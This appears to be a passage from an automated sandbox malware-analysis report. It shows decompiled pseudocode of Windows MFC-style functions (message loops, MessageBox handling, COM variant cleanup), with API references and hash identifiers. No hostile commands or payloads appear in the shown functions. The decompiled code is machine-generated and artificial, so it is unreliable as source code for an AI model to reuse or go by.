						 *((intOrPtr*)(_t122 - 0x10)) =  *((intOrPtr*)(E01266529(_t122 - 0x1c)));
						 *((intOrPtr*)(_t122 - 0x20)) = 0xfffffffd;
						E01283870(_t122 - 0x78, 0, 0x20);
						_t123 = _t123 + 0xc;
						E0127E554(_t122 - 0x48);
						 *(_t122 - 4) =  *(_t122 - 4) & 0x00000000;
						_t129 =  *((intOrPtr*)(_t121 + 0x48));
						if( *((intOrPtr*)(_t121 + 0x48)) == 0) {
							_t82 =  *((intOrPtr*)(_t121 + 0x40)) + _t100;
							__eflags = _t82;
						} else {
							_t95 = E0127BF05(_t100, _t121, _t119, _t121, _t129);
							 *(_t122 - 4) = 1;
							E0127E4D0(_t95, _t122 - 0x48, _t95);
							 *(_t122 - 4) = 0;
							__imp__#9(_t122 - 0x58, _t122 - 0x58, _t119 + 1);
							_t82 = _t122 - 0x48;
						}
						 *((intOrPtr*)(_t122 - 0x38)) = _t82;
						 *((intOrPtr*)(_t122 - 0x34)) = _t122 - 0x20;
						_t84 =  *((intOrPtr*)(_t122 - 0x10));
						 *((intOrPtr*)(_t122 - 0x30)) = 1;
						 *((intOrPtr*)(_t122 - 0x2c)) = 1;
						 *((intOrPtr*)(_t84 + 0x88)) = 1;
						_t107 =  *((intOrPtr*)(_t84 + 0x50));
						if(_t107 != 0) {
							_push(_t122 - 0x18);
							_push(0x12a0e38);
							_push(_t107);
							if( *((intOrPtr*)( *_t107))() >= 0) {
								_t88 =  *((intOrPtr*)(_t122 - 0x18));
								 *((intOrPtr*)( *_t88 + 0x18))(_t88,  *((intOrPtr*)( *((intOrPtr*)(_t122 - 0x10)) + 0x9c)), 0x12a0e48, 0, 4, _t122 - 0x38, 0, _t122 - 0x78, _t122 - 0x28);
								_t90 =  *((intOrPtr*)(_t122 - 0x18));
								 *((intOrPtr*)( *_t90 + 8))(_t90);
								 *( *((intOrPtr*)(_t122 - 0x10)) + 0x88) =  *( *((intOrPtr*)(_t122 - 0x10)) + 0x88) & 0x00000000;
								if( *((intOrPtr*)(_t122 - 0x74)) != 0) {
									__imp__#6( *((intOrPtr*)(_t122 - 0x74)));
								}
								if( *((intOrPtr*)(_t122 - 0x70)) != 0) {
									__imp__#6( *((intOrPtr*)(_t122 - 0x70)));
								}
								if( *((intOrPtr*)(_t122 - 0x6c)) != 0) {
									__imp__#6( *((intOrPtr*)(_t122 - 0x6c)));
								}
								 *(_t122 - 0x14) =  *(_t122 - 0x14) + 1;
								_t100 = _t100 + 0x10;
							}
						}
						 *(_t122 - 4) =  *(_t122 - 4) | 0xffffffff;
						__imp__#9(_t122 - 0x48);
						_t112 =  *(_t122 - 0x24);
					} while ( *((intOrPtr*)(_t122 - 0x1c)) != 0);
					_t102 =  *(_t122 - 0x14);
					L18:
					_t119 = _t119 + 1;
				} while (_t119 <  *((intOrPtr*)(_t121 + 0x10)));
				goto L19;
			}


















                                                                                                                0x0127c59e
                                                                                                                0x0127c5a5
                                                                                                                0x0127c5aa
                                                                                                                0x0127c5ac
                                                                                                                0x0127c5ae
                                                                                                                0x0127c5b5
                                                                                                                0x0127c5b7
                                                                                                                0x0127c5bd
                                                                                                                0x0127c72d
                                                                                                                0x0127c72d
                                                                                                                0x0127c738
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0127c5c3
                                                                                                                0x0127c5c3
                                                                                                                0x0127c5c6
                                                                                                                0x0127c5c9
                                                                                                                0x0127c5cc
                                                                                                                0x0127c5d2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0127c5d8
                                                                                                                0x0127c5db
                                                                                                                0x0127c5e0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0127c5e8
                                                                                                                0x0127c5eb
                                                                                                                0x0127c601
                                                                                                                0x0127c608
                                                                                                                0x0127c60f
                                                                                                                0x0127c614
                                                                                                                0x0127c61b
                                                                                                                0x0127c620
                                                                                                                0x0127c624
                                                                                                                0x0127c628
                                                                                                                0x0127c65c
                                                                                                                0x0127c65c
                                                                                                                0x0127c62a
                                                                                                                0x0127c634
                                                                                                                0x0127c63d
                                                                                                                0x0127c641
                                                                                                                0x0127c649
                                                                                                                0x0127c64e
                                                                                                                0x0127c654
                                                                                                                0x0127c654
                                                                                                                0x0127c65e
                                                                                                                0x0127c667
                                                                                                                0x0127c66a
                                                                                                                0x0127c66d
                                                                                                                0x0127c670
                                                                                                                0x0127c673
                                                                                                                0x0127c679
                                                                                                                0x0127c67e
                                                                                                                0x0127c689
                                                                                                                0x0127c68a
                                                                                                                0x0127c68f
                                                                                                                0x0127c694
                                                                                                                0x0127c696
                                                                                                                0x0127c6bc
                                                                                                                0x0127c6bf
                                                                                                                0x0127c6c5
                                                                                                                0x0127c6cb
                                                                                                                0x0127c6d6
                                                                                                                0x0127c6db
                                                                                                                0x0127c6db
                                                                                                                0x0127c6e5
                                                                                                                0x0127c6ea
                                                                                                                0x0127c6ea
                                                                                                                0x0127c6f4
                                                                                                                0x0127c6f9
                                                                                                                0x0127c6f9
                                                                                                                0x0127c6ff
                                                                                                                0x0127c702
                                                                                                                0x0127c702
                                                                                                                0x0127c694
                                                                                                                0x0127c705
                                                                                                                0x0127c70d
                                                                                                                0x0127c717
                                                                                                                0x0127c717
                                                                                                                0x0127c720
                                                                                                                0x0127c723
                                                                                                                0x0127c723
                                                                                                                0x0127c724
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 0127C5A5
                                                                                                                • _memset.LIBCMT ref: 0127C60F
                                                                                                                  • Part of subcall function 0127E554: _memset.LIBCMT ref: 0127E55E
                                                                                                                • VariantClear.OLEAUT32(?), ref: 0127C64E
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0127C6DB
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0127C6EA
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0127C6F9
                                                                                                                • VariantClear.OLEAUT32(00000000), ref: 0127C70D
                                                                                                                  • Part of subcall function 0127BF05: __EH_prolog3_GS.LIBCMT ref: 0127BF0F
                                                                                                                  • Part of subcall function 0127BF05: VariantClear.OLEAUT32(?), ref: 0127BF72
                                                                                                                  • Part of subcall function 0127E4D0: VariantCopy.OLEAUT32(?,?), ref: 0127E4DF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ClearFreeString$_memset$CopyH_prolog3H_prolog3_
                                                                                                                • String ID:
                                                                                                                • API String ID: 3746181197-0
                                                                                                                • Opcode ID: adce76846f33c7f777c38e0b4353d176fd50b8b4a1f9ff21ad85713b967beae1
                                                                                                                • Instruction ID: 8dcbd8f0c7e1d12b5d0c24fd06082846fb2e4773ea618ff2133312d3a957487e
                                                                                                                • Opcode Fuzzy Hash: adce76846f33c7f777c38e0b4353d176fd50b8b4a1f9ff21ad85713b967beae1
                                                                                                                • Instruction Fuzzy Hash: FC514A71A1020ADFDF24CFA8D888BEEBBB9FF48304F104169E215A7291DB71A945CF54
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0126D427, Relevance: 10.6, APIs: 7, Instructions: 120windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 91%
                                                                                                                			E0126D427(intOrPtr* __ecx, void* __edx, signed int _a4) {
				struct tagMSG* _v8;
				intOrPtr _v12;
				struct HWND__* _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t38;
				struct tagMSG* _t39;
				signed int _t40;
				signed int _t41;
				void* _t43;
				void* _t45;
				intOrPtr _t48;
				long _t49;
				struct HWND__* _t50;
				struct tagMSG* _t54;
				long _t58;
				intOrPtr* _t60;
				void* _t62;
				intOrPtr _t64;
				intOrPtr* _t65;

				_t62 = __edx;
				_t59 = __ecx;
				_t58 = 0;
				_t64 = 1;
				_t65 = __ecx;
				_v12 = 1;
				if((_a4 & 0x00000004) == 0 || (E0126F75B(__ecx) & 0x10000000) != 0) {
					_t64 = 0;
				}
				_t38 = GetParent( *(_t65 + 0x20));
				 *(_t65 + 0x58) =  *(_t65 + 0x58) | 0x00000018;
				_v16 = _t38;
				_t39 = E01266B3D( *(_t65 + 0x58));
				_v8 = _t39;
				L4:
				while(1) {
					L4:
					if(_v12 == 0) {
						while(1) {
							L17:
							_t40 = E01266D21(_t59, _t62, _t64, _t65, _t79);
							if(_t40 == 0) {
								break;
							}
							if(_t64 != 0) {
								_t54 = _v8;
								if(_t54->message == 0x118 || _t54->message == 0x104) {
									E0126FC09(_t65, "true");
									UpdateWindow( *(_t65 + 0x20));
									_t64 = 0;
								}
							}
							_t60 = _t65;
							_t43 =  *((intOrPtr*)( *_t65 + 0x88))();
							_t85 = _t43;
							if(_t43 == 0) {
								 *(_t65 + 0x58) =  *(_t65 + 0x58) & 0xffffffe7;
								return  *((intOrPtr*)(_t65 + 0x60));
							} else {
								_push(_v8);
								_t45 = E01266CC8(_t58, _t60, _t64, _t65, _t85);
								_pop(_t59);
								if(_t45 != 0) {
									_v12 = 1;
									_t58 = 0;
								}
								if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
									continue;
								} else {
									_t39 = _v8;
									goto L4;
								}
							}
						}
						_push(0);
						E01263A17();
						_t41 = _t40 | 0xffffffff;
						__eflags = _t41;
						return _t41;
					}
					while(PeekMessageA(_t39, 0, 0, 0, 0) == 0) {
						if(_t64 != 0) {
							_t59 = _t65;
							E0126FC09(_t65, "true");
							UpdateWindow( *(_t65 + 0x20));
							_t64 = 0;
						}
						if((_a4 & 0x00000001) == 0) {
							_t50 = _v16;
							if(_t50 != 0 && _t58 == 0) {
								SendMessageA(_t50, 0x121, _t58,  *(_t65 + 0x20));
							}
						}
						if((_a4 & 0x00000002) != 0) {
							L14:
							_t48 = 0;
							_v12 = 0;
							goto L16;
						} else {
							_t49 = SendMessageA( *(_t65 + 0x20), 0x36a, 0, _t58);
							_t58 = _t58 + 1;
							if(_t49 != 0) {
								_t48 = _v12;
								L16:
								_t79 = _t48;
								_t39 = _v8;
								if(_t48 != 0) {
									continue;
								}
								goto L17;
							}
							goto L14;
						}
					}
					goto L17;
				}
			}

























                                                                                                                0x0126d427
                                                                                                                0x0126d427
                                                                                                                0x0126d432
                                                                                                                0x0126d434
                                                                                                                0x0126d435
                                                                                                                0x0126d43b
                                                                                                                0x0126d43e
                                                                                                                0x0126d44c
                                                                                                                0x0126d44c
                                                                                                                0x0126d451
                                                                                                                0x0126d457
                                                                                                                0x0126d45b
                                                                                                                0x0126d45e
                                                                                                                0x0126d463
                                                                                                                0x00000000
                                                                                                                0x0126d466
                                                                                                                0x0126d466
                                                                                                                0x0126d46a
                                                                                                                0x0126d4e5
                                                                                                                0x0126d4e5
                                                                                                                0x0126d4e5
                                                                                                                0x0126d4ec
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0126d4f0
                                                                                                                0x0126d4f2
                                                                                                                0x0126d4fc
                                                                                                                0x0126d50b
                                                                                                                0x0126d513
                                                                                                                0x0126d519
                                                                                                                0x0126d519
                                                                                                                0x0126d4fc
                                                                                                                0x0126d51d
                                                                                                                0x0126d51f
                                                                                                                0x0126d525
                                                                                                                0x0126d527
                                                                                                                0x0126d55c
                                                                                                                0x00000000
                                                                                                                0x0126d529
                                                                                                                0x0126d529
                                                                                                                0x0126d52c
                                                                                                                0x0126d531
                                                                                                                0x0126d534
                                                                                                                0x0126d536
                                                                                                                0x0126d53d
                                                                                                                0x0126d53d
                                                                                                                0x0126d552
                                                                                                                0x00000000
                                                                                                                0x0126d554
                                                                                                                0x0126d554
                                                                                                                0x00000000
                                                                                                                0x0126d554
                                                                                                                0x0126d552
                                                                                                                0x0126d527
                                                                                                                0x0126d565
                                                                                                                0x0126d567
                                                                                                                0x0126d56c
                                                                                                                0x0126d56c
                                                                                                                0x00000000
                                                                                                                0x0126d56c
                                                                                                                0x0126d46c
                                                                                                                0x0126d481
                                                                                                                0x0126d485
                                                                                                                0x0126d487
                                                                                                                0x0126d48f
                                                                                                                0x0126d495
                                                                                                                0x0126d495
                                                                                                                0x0126d49b
                                                                                                                0x0126d49d
                                                                                                                0x0126d4a2
                                                                                                                0x0126d4b2
                                                                                                                0x0126d4b2
                                                                                                                0x0126d4a2
                                                                                                                0x0126d4bc
                                                                                                                0x0126d4d4
                                                                                                                0x0126d4d4
                                                                                                                0x0126d4d6
                                                                                                                0x00000000
                                                                                                                0x0126d4be
                                                                                                                0x0126d4c9
                                                                                                                0x0126d4cf
                                                                                                                0x0126d4d2
                                                                                                                0x0126d4db
                                                                                                                0x0126d4de
                                                                                                                0x0126d4de
                                                                                                                0x0126d4e0
                                                                                                                0x0126d4e3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0126d4e3
                                                                                                                0x00000000
                                                                                                                0x0126d4d2
                                                                                                                0x0126d4bc
                                                                                                                0x00000000
                                                                                                                0x0126d46c

                                                                                                                APIs
                                                                                                                • GetParent.USER32(?), ref: 0126D451
                                                                                                                • PeekMessageA.USER32(0126147C,00000000,00000000,00000000,00000000), ref: 0126D475
                                                                                                                • UpdateWindow.USER32(?), ref: 0126D48F
                                                                                                                • SendMessageA.USER32(?,00000121,00000000,?), ref: 0126D4B2
                                                                                                                • SendMessageA.USER32(?,0000036A,00000000,00000000), ref: 0126D4C9
                                                                                                                • UpdateWindow.USER32(?), ref: 0126D513
                                                                                                                • PeekMessageA.USER32(0126147C,00000000,00000000,00000000,00000000), ref: 0126D54A
                                                                                                                  • Part of subcall function 0126F75B: GetWindowLongA.USER32 ref: 0126F769
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                                • String ID:
                                                                                                                • API String ID: 2853195852-0
                                                                                                                • Opcode ID: f63844766e1fcb3a0c87362f6a0001fac3dafede52f009acf50dfb10e6668b73
                                                                                                                • Instruction ID: 0addf7820bdb7968edab23becf0ff40f99b488b6d9f6c1e76a966e98a07a821c
                                                                                                                • Opcode Fuzzy Hash: f63844766e1fcb3a0c87362f6a0001fac3dafede52f009acf50dfb10e6668b73
                                                                                                                • Instruction Fuzzy Hash: 4341833071034EABEF219FBDDC49BAA7BACEF40715F104158EA85A65D1DB71A9C1C740
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0126553E, Relevance: 10.6, APIs: 7, Instructions: 118windowthreadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 92%
                                                                                                                			E0126553E(void* __edx, void* __eflags, int _a4, CHAR* _a8, int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v9;
				char _v268;
				int _v272;
				struct HWND__* _v276;
				long _v280;
				CHAR* _v284;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t31;
				long _t41;
				CHAR* _t44;
				signed int _t52;
				intOrPtr _t55;
				long _t58;
				int _t61;
				intOrPtr _t63;
				void* _t67;
				struct HWND__* _t68;
				int _t69;
				long _t70;
				signed int _t71;

				_t67 = __edx;
				_t31 =  *0x12aa3f0; // 0xddd5d539
				_v8 = _t31 ^ _t71;
				_v272 = _a4;
				_v284 = _a8;
				E0126543B(0);
				_t68 = E012654A2(0,  &_v276);
				if(_t68 != _v276) {
					EnableWindow(_t68, "true");
				}
				_v280 = 0;
				_t70 = 0;
				GetWindowThreadProcessId(_t68,  &_v280);
				if(_t68 == 0 || _v280 != GetCurrentProcessId()) {
					L6:
					_t63 = _v272;
					if(_t63 != 0) {
						_t70 = _t63 + 0x7c;
					}
					goto L8;
				} else {
					_t58 = SendMessageA(_t68, 0x376, 0, 0);
					if(_t58 == 0) {
						goto L6;
					} else {
						_t63 = _v272;
						_t70 = _t58;
						L8:
						_v272 = 0;
						if(_t70 != 0) {
							_v272 =  *_t70;
							_t55 = _a16;
							if(_t55 != 0) {
								 *_t70 = _t55 + 0x30000;
							}
						}
						_t61 = _a12;
						if((_t61 & 0x000000f0) == 0) {
							_t52 = _t61 & 0x0000000f;
							if(_t52 <= 1) {
								_t61 = _t61 | 0x00000030;
							} else {
								if(_t52 + 0xfffffffd <= 1) {
									_t61 = _t61 | 0x00000020;
								}
							}
						}
						_v268 = 0;
						if(_t63 == 0) {
							_t41 = GetModuleFileNameA(0,  &_v268, 0x104);
							asm("sbb al, al");
							_v9 = _v9 &  ~(_t41 - 0x104);
							_t44 =  &_v268;
						} else {
							_t44 =  *(_t63 + 0x50);
						}
						_t69 = MessageBoxA(_t68, _v284, _t44, _t61);
						if(_t70 != 0) {
							 *_t70 = _v272;
						}
						if(_v276 != 0) {
							EnableWindow(_v276, "true");
						}
						E0126543B("true");
						return E012833E5(_t61, _v8 ^ _t71, _t67, _t69, _t70);
					}
				}
			}


























                                                                                                                0x0126553e
                                                                                                                0x01265547
                                                                                                                0x0126554e
                                                                                                                0x01265557
                                                                                                                0x01265563
                                                                                                                0x01265569
                                                                                                                0x0126557c
                                                                                                                0x01265584
                                                                                                                0x01265589
                                                                                                                0x01265589
                                                                                                                0x01265595
                                                                                                                0x0126559d
                                                                                                                0x0126559f
                                                                                                                0x012655a7
                                                                                                                0x012655d3
                                                                                                                0x012655d3
                                                                                                                0x012655db
                                                                                                                0x012655dd
                                                                                                                0x012655dd
                                                                                                                0x00000000
                                                                                                                0x012655b7
                                                                                                                0x012655bf
                                                                                                                0x012655c7
                                                                                                                0x00000000
                                                                                                                0x012655c9
                                                                                                                0x012655c9
                                                                                                                0x012655cf
                                                                                                                0x012655e0
                                                                                                                0x012655e0
                                                                                                                0x012655e8
                                                                                                                0x012655ec
                                                                                                                0x012655f2
                                                                                                                0x012655f7
                                                                                                                0x012655fe
                                                                                                                0x012655fe
                                                                                                                0x012655f7
                                                                                                                0x01265600
                                                                                                                0x01265606
                                                                                                                0x0126560a
                                                                                                                0x01265610
                                                                                                                0x0126561f
                                                                                                                0x01265612
                                                                                                                0x01265618
                                                                                                                0x0126561a
                                                                                                                0x0126561a
                                                                                                                0x01265618
                                                                                                                0x01265610
                                                                                                                0x01265622
                                                                                                                0x0126562b
                                                                                                                0x01265640
                                                                                                                0x0126564d
                                                                                                                0x0126564f
                                                                                                                0x01265652
                                                                                                                0x0126562d
                                                                                                                0x0126562d
                                                                                                                0x0126562d
                                                                                                                0x01265667
                                                                                                                0x0126566b
                                                                                                                0x01265673
                                                                                                                0x01265673
                                                                                                                0x0126567c
                                                                                                                0x01265686
                                                                                                                0x01265686
                                                                                                                0x0126568e
                                                                                                                0x012656a6
                                                                                                                0x012656a6
                                                                                                                0x012655c7

                                                                                                                APIs
                                                                                                                  • Part of subcall function 012654A2: GetParent.USER32(00000028), ref: 012654F0
                                                                                                                  • Part of subcall function 012654A2: GetLastActivePopup.USER32(00000028), ref: 01265503
                                                                                                                  • Part of subcall function 012654A2: IsWindowEnabled.USER32(00000028), ref: 01265517
                                                                                                                  • Part of subcall function 012654A2: EnableWindow.USER32(00000028,00000000), ref: 0126552A
                                                                                                                • EnableWindow.USER32(?,?), ref: 01265589
                                                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 0126559F
                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 012655A9
                                                                                                                • SendMessageA.USER32(?,00000376,00000000,00000000), ref: 012655BF
                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 01265640
                                                                                                                • MessageBoxA.USER32 ref: 01265661
                                                                                                                • EnableWindow.USER32(00000000,?), ref: 01265686
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Window$Enable$MessageProcess$ActiveCurrentEnabledFileLastModuleNameParentPopupSendThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 1924968399-0
                                                                                                                • Opcode ID: b3b1228728f8a804d3e70d4f335303b1a8263047034d9bc7c3baeb82cea7aac7
                                                                                                                • Instruction ID: 72f630777202e9485b37aa3b88b74ca152765fffed8a4a75f231f1db6e329aa4
                                                                                                                • Opcode Fuzzy Hash: b3b1228728f8a804d3e70d4f335303b1a8263047034d9bc7c3baeb82cea7aac7
                                                                                                                • Instruction Fuzzy Hash: B7416F71A202199FEB258F68EC89BEAB7B8EB05794F004199E645D72C0DA709DC0CF91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0126518E, Relevance: 10.6, APIs: 7, Instructions: 115COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 83%
                                                                                                                			E0126518E(void* __ebx, intOrPtr* __ecx, void* __edi) {
				signed int _v0;
				long _v4;
				long _v8;
				void* __esi;
				void* _t38;
				void* _t41;
				struct HICON__* _t49;
				long _t54;
				struct HWND__* _t55;
				long _t56;
				struct HWND__* _t57;
				long _t58;
				struct HWND__* _t63;
				long _t64;
				void* _t65;
				long _t70;
				long _t73;
				long _t75;
				long _t76;
				intOrPtr _t79;
				signed int _t80;
				intOrPtr* _t81;
				long _t83;
				void* _t85;
				long _t88;
				intOrPtr* _t89;
				struct HWND__* _t92;
				struct HWND__* _t94;
				long _t95;
				struct HWND__* _t97;
				long _t98;
				void* _t101;
				void* _t102;
				void* _t107;

				_t82 = __edi;
				_t72 = __ecx;
				_t69 = __ebx;
				_t79 =  *((intOrPtr*)(__ecx + 0x7c));
				if(_t79 == 0) {
					_t88 = E01263918();
					__eflags = _t88;
					if(_t88 == 0) {
						E01268275(__ecx);
						asm("int3");
						_t101 = _t107;
						_t80 = _v0;
						__eflags = _t80;
						if(_t80 < 0) {
							L11:
							_t41 = E01268275(_t72);
							asm("int3");
							_push(_t101);
							_t102 = _t107;
							__eflags = _v4;
							_t81 = _t72;
							if(_v4 == 0) {
								E01268275(_t72);
								asm("int3");
								_push(_t102);
								_push(_t88);
								_t83 = _v8;
								_t89 = _t72;
								__eflags = _t83;
								if(_t83 == 0) {
									L18:
									__eflags =  *0x1389e3c;
									if( *0x1389e3c == 0) {
										goto L25;
									} else {
										E01270000(_t72, _t89, 2);
										 *(_t89 + 0x84) =  *(_t89 + 0x84) + _t83;
										__eflags =  *(_t89 + 0x84);
										if( *(_t89 + 0x84) <= 0) {
											_t21 = _t89 + 0x84;
											 *_t21 =  *(_t89 + 0x84) & 0x00000000;
											__eflags =  *_t21;
											SetCursor( *(_t89 + 0x88));
										} else {
											_t49 = SetCursor( *0x1389e3c);
											__eflags = _t83;
											if(_t83 > 0) {
												__eflags =  *(_t89 + 0x84) - 1;
												if( *(_t89 + 0x84) == 1) {
													 *(_t89 + 0x88) = _t49;
												}
											}
										}
										return E01270075(_t72, 2);
									}
								} else {
									__eflags = _t83 - 1;
									if(_t83 == 1) {
										goto L18;
									} else {
										__eflags = _t83 - 0xffffffff;
										if(_t83 != 0xffffffff) {
											L25:
											E01268275(_t72);
											asm("int3");
											return SendMessageA( *( *((intOrPtr*)(_t72 + 0x20)) + 0x20), 0x10, 0, 0);
										} else {
											goto L18;
										}
									}
								}
							} else {
								_t73 =  *(_t81 + 0x8c);
								__eflags = _t73;
								if(_t73 != 0) {
									_t41 =  *((intOrPtr*)( *_t73 + 4))(_v0,  *((intOrPtr*)(_t81 + 0x54)));
								}
								return _t41;
							}
						} else {
							__eflags = _t80 -  *((intOrPtr*)(__ecx + 4));
							if(_t80 >=  *((intOrPtr*)(__ecx + 4))) {
								goto L11;
							} else {
								return  *((intOrPtr*)(__ecx + 8)) + _t80 * 4;
							}
						}
					} else {
						_t54 =  *((intOrPtr*)( *_t88 + 0x14c))();
						_t75 = _t88;
						_pop(_t91);
						__eflags = _t54;
						if(_t54 == 0) {
							L31:
							_t70 = _t75;
							_t55 = GetCapture();
							_t85 = SendMessageA;
							while(1) {
								_t92 = _t55;
								__eflags = _t92;
								if(_t92 == 0) {
									break;
								}
								_t56 = SendMessageA(_t92, 0x365, 0, 0);
								__eflags = _t56;
								if(__eflags != 0) {
									L45:
									return _t56;
								} else {
									_t55 = E0126A0C7(_t70, _t75, _t79, _t85, __eflags, _t92);
									continue;
								}
								goto L48;
							}
							_t57 = GetFocus();
							while(1) {
								_t94 = _t57;
								__eflags = _t94;
								if(_t94 == 0) {
									break;
								}
								_t56 = SendMessageA(_t94, 0x365, 0, 0);
								__eflags = _t56;
								if(__eflags != 0) {
									goto L45;
								} else {
									_t57 = E0126A0C7(_t70, _t75, _t79, _t85, __eflags, _t94);
									continue;
								}
								goto L48;
							}
							_t76 = _t70;
							_t58 = E0126B5A0(_t76, _t85);
							__eflags = _t58;
							if(_t58 == 0) {
								E01268275(_t76);
								asm("int3");
								_push(_t94);
								_t95 = _t76;
								 *_t95 = 0x129b580;
								E01261AE0(_t95 + 0xc, _t85, _t95, E0126811C());
								 *(_t95 + 4) =  *(_t95 + 4) | 0xffffffff;
								 *(_t95 + 8) =  *(_t95 + 8) & 0x00000000;
								_t36 = _t95 + 0x10;
								 *_t36 =  *(_t95 + 0x10) & 0x00000000;
								__eflags =  *_t36;
								return _t95;
							} else {
								_t63 = GetLastActivePopup( *(_t58 + 0x20));
								while(1) {
									_t97 = _t63;
									_push(0);
									__eflags = _t97;
									if(_t97 == 0) {
										break;
									}
									_t56 = SendMessageA(_t97, 0x365, 0, ??);
									__eflags = _t56;
									if(__eflags == 0) {
										_t63 = E0126A0C7(_t70, _t76, _t79, _t85, __eflags, _t97);
										continue;
									}
									goto L45;
								}
								_t56 = SendMessageA( *(_t70 + 0x20), 0x111, 0xe147, ??);
								goto L45;
							}
						} else {
							_push(_t91);
							_t98 = _t75;
							_t64 =  *(_t98 + 0x84);
							__eflags = _t64;
							if(_t64 == 0) {
								_pop(_t91);
								goto L31;
							} else {
								__eflags = _t64 - 0x3f107;
								if(__eflags != 0) {
									_t65 = E012692A5(__ebx, __edi, _t98, __eflags);
									_t64 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t65 + 4)))) + 0xc8))( *(_t98 + 0x84), "true");
								}
								return _t64;
							}
						}
					}
				} else {
					if(_t79 != 0x3f107) {
						_push("true");
						_push(_t79);
						return  *((intOrPtr*)( *__ecx + 0xc8))();
					}
					return _t38;
				}
				L48:
			}





































                                                                                                                0x0126518e
                                                                                                                0x0126518e
                                                                                                                0x0126518e
                                                                                                                0x0126518e
                                                                                                                0x01265193
                                                                                                                0x012651af
                                                                                                                0x012651b1
                                                                                                                0x012651b3
                                                                                                                0x012651cf
                                                                                                                0x012651d4
                                                                                                                0x012651d6
                                                                                                                0x012651d8
                                                                                                                0x012651db
                                                                                                                0x012651dd
                                                                                                                0x012651ee
                                                                                                                0x012651ee
                                                                                                                0x012651f3
                                                                                                                0x012651f4
                                                                                                                0x012651f5
                                                                                                                0x012651f7
                                                                                                                0x012651fb
                                                                                                                0x012651fd
                                                                                                                0x01265218
                                                                                                                0x0126521d
                                                                                                                0x0126521e
                                                                                                                0x01265221
                                                                                                                0x01265223
                                                                                                                0x01265226
                                                                                                                0x01265228
                                                                                                                0x0126522a
                                                                                                                0x01265236
                                                                                                                0x01265236
                                                                                                                0x0126523d
                                                                                                                0x00000000
                                                                                                                0x0126523f
                                                                                                                0x01265241
                                                                                                                0x01265246
                                                                                                                0x0126524c
                                                                                                                0x01265253
                                                                                                                0x0126527c
                                                                                                                0x0126527c
                                                                                                                0x0126527c
                                                                                                                0x01265283
                                                                                                                0x01265255
                                                                                                                0x0126525b
